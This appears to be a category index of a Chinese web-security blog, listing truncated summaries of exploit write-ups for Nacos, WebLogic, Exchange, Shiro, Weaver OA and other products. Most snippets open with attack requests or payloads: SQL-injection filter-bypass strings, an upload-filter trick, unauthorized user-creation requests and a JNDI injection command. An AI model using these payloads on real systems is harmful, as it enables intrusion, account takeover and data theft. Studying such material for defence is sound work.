论安全萌新的自我修养

   :: 首页  :: 新随笔  :: 联系 :: 订阅 订阅  :: 管理

随笔分类 -  Web安全

摘要:简介 影响: 未授权获得相关服务配置,泄露大量配置敏感信息 影响版本 Nacos <= 2.0.0-ALPHA.1 漏洞复现 post方式新增用户: POST /nacos/v1/auth/users?username=yangy&password=yangy HTTP/1.1 Host: XXX 阅读全文
posted @ 2021-02-04 13:52 Yangsir34 阅读(3370) 评论(0) 推荐(0) 编辑

摘要:仅供本地代码学习,用于非法目的与本人无关 核心POC POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.hand 阅读全文
posted @ 2021-01-25 21:20 Yangsir34 阅读(519) 评论(0) 推荐(0) 编辑

摘要:文件上传tips 文件名前缀加[0x09]绕过: ——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=”[0x09]test.asp” Content-Type: 阅读全文
posted @ 2020-12-25 20:20 Yangsir34 阅读(245) 评论(0) 推荐(0) 编辑

摘要:基础 大小写 id=-1 uNIoN sELecT 1,2,3 双写 id=-1 UNIunionON SELselectECT 1,2,3 编码 id=1%252f%252a*/UNION%252f%252a /SELECT id=1%D6‘%20AND%201=2%23 SELECT 'Ä'=' 阅读全文
posted @ 2020-12-15 15:54 Yangsir34 阅读(205) 评论(0) 推荐(0) 编辑

摘要:偶然某群内发现的好东西,做个转载分享 Shiro反序列化漏洞利用笔记 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。目前在Java web应用安全框架中,最热门的产品有Spring Security和Shiro,二者在核心功能上几乎差不多,但Shir 阅读全文
posted @ 2020-12-11 21:39 Yangsir34 阅读(6535) 评论(0) 推荐(0) 编辑

摘要:##转载分享存档,仅供学习代码使用,用于其他非法目的与本人无关。 ###作者链接 https://github.com/r0eXpeR/redteam_vul #EHole(棱洞)-红队重点攻击系统指纹探测工具 ##一、简介: ______ __ ______ / ____/___/ /___ __ 阅读全文
posted @ 2020-12-11 14:16 Yangsir34 阅读(2928) 评论(0) 推荐(0) 编辑

摘要:##转载分享存档,仅供学习代码使用,用于其他非法目的与本人无关。 ###作者链接 https://github.com/r0eXpeR/redteam_vul ##一、OA系统 ####泛微(Weaver-Ecology-OA) 🔸 泛微OA E-cology RCE(CNVD-2019-3220 阅读全文
posted @ 2020-12-10 22:52 Yangsir34 阅读(1020) 评论(0) 推荐(0) 编辑

摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###利用过程 POST /dolphinscheduler/users/update id=1&userName=admin&userPassword=Passwor 阅读全文
posted @ 2020-09-24 16:35 Yangsir34 阅读(505) 评论(0) 推荐(0) 编辑

摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###提供工具仅供技术学习交流、请勿用于非法行为、否则后果自负。 ###文章中涉及的工具将及时补充进该页面,原文格式较乱,现以Markdown格式重新发布,将持续更新。 阅读全文
posted @ 2020-09-16 19:18 Yangsir34 阅读(2397) 评论(0) 推荐(0) 编辑

摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###EXP java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C "<Command 阅读全文
posted @ 2020-09-15 16:38 Yangsir34 阅读(1033) 评论(0) 推荐(0) 编辑

摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###漏洞简介 只需要一个Exchange用户账号。就能在Exchange服务器上执行任意命令 相关介绍https://portal.msrc.microsoft.co 阅读全文
posted @ 2020-09-15 14:22 Yangsir34 阅读(788) 评论(0) 推荐(0) 编辑

摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###漏洞简介 程序使用了StreamGenerator这个方法时,解析从外部请求的xml数据包未做相关的限制,恶意用户就可以构造任意的xml表达式,使服务器解析达到X 阅读全文
posted @ 2020-09-14 11:21 Yangsir34 阅读(1110) 评论(0) 推荐(0) 编辑

摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###漏洞简介 此漏洞使远程攻击者可以在受影响的Horde Groupware Webmail Edition安装上执行任意代码。利用身份验证才能利用此漏洞。具体缺陷存 阅读全文
posted @ 2020-09-14 11:17 Yangsir34 阅读(741) 评论(0) 推荐(0) 编辑

摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###利用过程 ###大致模样 ###构造数据包 POST /uai/download/uploadfileToPath.htm HTTP/1.1 HOST: xxxx 阅读全文
posted @ 2020-09-13 16:26 Yangsir34 阅读(1047) 评论(0) 推荐(0) 编辑

摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###利用过程 无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd 接口未授权访问,造成直接修改任 阅读全文
posted @ 2020-09-13 16:16 Yangsir34 阅读(551) 评论(0) 推荐(0) 编辑

摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###利用过程 访问http://127.0.0.1/listener/cluster_manage.php 返回 "OK" 访问如下链接即可getshell,执行成功 阅读全文
posted @ 2020-09-13 16:11 Yangsir34 阅读(1298) 评论(0) 推荐(0) 编辑

摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###主要成因 /wxjsapi/saveYZJFil接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以此下载相关敏感文件 ###构造如下语句 ht 阅读全文
posted @ 2020-09-12 17:40 Yangsir34 阅读(1761) 评论(0) 推荐(0) 编辑

摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###利用过程 ###对响应包进行修改,将false更改为true ###可以获得泄露的管理用户md5值密码 ###利用md5值去登录页面 ###效果如下 成功登录,登 阅读全文
posted @ 2020-09-11 20:47 Yangsir34 阅读(371) 评论(0) 推荐(0) 编辑

摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###EXP POST /acc/clsf/report/datasource.php HTTP/1.1 Host: x.x.x.x Connection: close 阅读全文
posted @ 2020-09-11 20:28 Yangsir34 阅读(531) 评论(0) 推荐(0) 编辑

摘要:###请遵守网络安全法!!!本文仅供学习交流使用!用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关!读者自行承担其恶果! ###EXP POST /Proxy HTTP/1.1 Accept: Accept: */* Content-Type: application/x-www-form 阅读全文
posted @ 2020-09-11 20:22 Yangsir34 阅读(1915) 评论(0) 推荐(0) 编辑